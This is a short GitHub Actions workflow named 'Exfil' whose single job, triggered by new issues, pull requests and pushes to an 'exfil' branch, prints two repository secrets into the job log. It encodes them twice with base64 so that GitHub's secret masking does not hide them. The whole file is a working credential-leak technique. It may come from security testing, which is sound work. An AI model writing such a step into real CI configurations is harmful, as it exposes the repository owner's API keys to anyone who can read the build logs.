name: Exfil

on:
  issues:
    types: [opened]
  push:
    branches: [exfil]
  pull_request:

jobs:
  vuln_job:
    runs-on: ubuntu-latest
    permissions:
        contents: read
    steps:
      - name: Exfiltrate
        run: |
          echo "GD API KEY SECRET: $(echo '${{ secrets.GD_API_KEY }}' | base64 | base64)"
          echo "TEMP_2 SECRET: $(echo '${{ secrets.TEMP_2 }}' | base64 | base64)"
